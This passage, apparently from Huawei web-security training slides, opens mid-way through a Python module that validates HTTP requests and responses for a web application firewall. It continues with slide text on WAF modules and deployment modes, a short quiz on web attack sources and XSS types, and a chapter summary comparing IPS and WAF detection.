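        "idcard": re.compile(r"^[0-9A-Za-z]{18}$"),   # 18 digits and letters
        "password": re.compile(r"^[0-9]{6}$"),        # 6 digits
    },
}


def check_request_header(method: str, url: str, version: str,
                         headers: Dict[str, str]) -> List[str]:
    """Step 1: request line and header fields against the protocol."""
    f: List[str] = []
    if method not in ALLOWED_METHODS:
        f.append(f"method not allowed: {method}")
    if version not in ALLOWED_VERSIONS:
        f.append(f"bad version: {version}")
    if not url.startswith("/") or re.search(r"[\x00-\x1f\s]", url):
        f.append("malformed URL")
    for name, value in headers.items():   # CR/LF in a value is header injection
        if not HEADER_NAME.match(name) or re.search(r"[\r\n]", value):
            f.append(f"malformed header: {name}")
    if not headers.get("User-Agent"):
        f.append("missing User-Agent")
    cookie = headers.get("Cookie", "")
    if cookie and not all(COOKIE_PAIR.match(c.strip()) for c in cookie.split(";")):
        f.append("malformed Cookie")
    referer = headers.get("Referer")
    if referer is not None and urlsplit(referer).scheme not in ("http", "https"):
        f.append("malformed Referer")
    return f


def check_request_content(method: str, url: str, body: str) -> List[str]:
    """Step 2: for a POST to a modelled page, compare each field with the model."""
    f: List[str] = []
    model = FIELD_MODEL.get(urlsplit(url).path)
    if method != "POST" or model is None:
        return f                          # content detection applies to modelled POSTs only
    for field, values in parse_qs(body, keep_blank_values=True).items():
        pattern = model.get(field)
        if pattern is None:
            f.append(f"unexpected field: {field}")
            continue
        for v in values:
            if not pattern.match(v):
                f.append(f"field {field} violates model: {v!r}")
    return f


def check_response(status: str, headers: Dict[str, str], body: str) -> List[str]:
    """Steps 3 and 4: Response_code and server fields, then information disclosure."""
    f: List[str] = []
    if not (status.isdigit() and 100 <= int(status) <= 599):
        f.append(f"bad Response_code: {status}")
    for h in ("Server", "X-Powered-By"):
        if VERSION_LEAK.search(headers.get(h, "")):
            f.append(f"{h} header discloses a version")
    if ERROR_PAGE.search(body):
        f.append("error details disclosed in response page")
    return f
```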
High-Performance Detection

Figure: the WAF between web users and hackers and the web applications contains a high-performance detection module in front of the WAF rule detection module.

Anti-tampering

Figure: the WAF between web users and hackers and the web applications contains a cache module and an anti-tampering module.

Automatic Detection Application

Figure: the WAF between web users and hackers and the web applications contains a site detection module and a protection site module.

High-Speed Cache

Figure: user 1 and user 2 both obtain content from the web applications through the cache module of the WAF.
WAF Deployment Mode (1/2)

- The WAF supports multiple deployment modes, such as transparent proxy, reverse proxy, and gateway mode. The transparent proxy mode is the most widely used. The following figure shows the working principle of the transparent proxy mode.

WAF Deployment Mode (2/2)

Figure: the WAF between web users and hackers and the web applications, with its CC attack defense, high-performance delivery engine, self-learning application whitelist, and blacklist signature database modules, shown against the protocol layers:
  Engine (above the application layer): handles traffic that matches the IP address and port number of the site to be protected.
  Application layer: traffic that does not match the IP address and port number of the site to be protected is passed through.
  Presentation layer, session layer, transmission layer, network layer: proxy/transparent transmission.
  Data link layer: MAC address learning and data packet forwarding; traffic that matches the IP address of the site to be protected is taken up, traffic that does not match is forwarded.
  Physical layer.
Quiz

1. Which of the following are the main sources of web attacks?

A. Client
B. Server
C. Application software
D. Communication channel

2. Which of the following are XSS attacks?

A. Reflected XSS
B. Anonymous XSS
C. Stored XSS
D. Injection XSS
Summary

- This chapter describes the threats hidden in web applications and some defense methods, starting from the HTTP protocol format. The chapter can be summarized into the following topics:
  - Basic structure of web applications, web working principles, HTTP working process, and HTTP packet structure
  - Principles and configurations of URL filtering
  - Common technical methods for web security defense
  - Common web attacks (such as SQL injection and XSS)
  - Defense principles of the WAF
More Information

- Both the IPS and the WAF can detect HTTP vulnerabilities, but the two functions differ. For example, in attack sample identification, the IPS identifies samples using dictionary or keyword matching, which is not flexible. By contrast, the WAF supports flexible syntax such as regular matching, length calculation, and reverse calculation for object matching, and has multiple complex decoding capabilities.
- As for the working mode, the WAF supports code conversion, whereas the IPS supports static identification only. Therefore, the WAF is more powerful than the IPS in web application attack defense.
THANK YOU

HUAWEI TECHNOLOGIES CO., LTD.
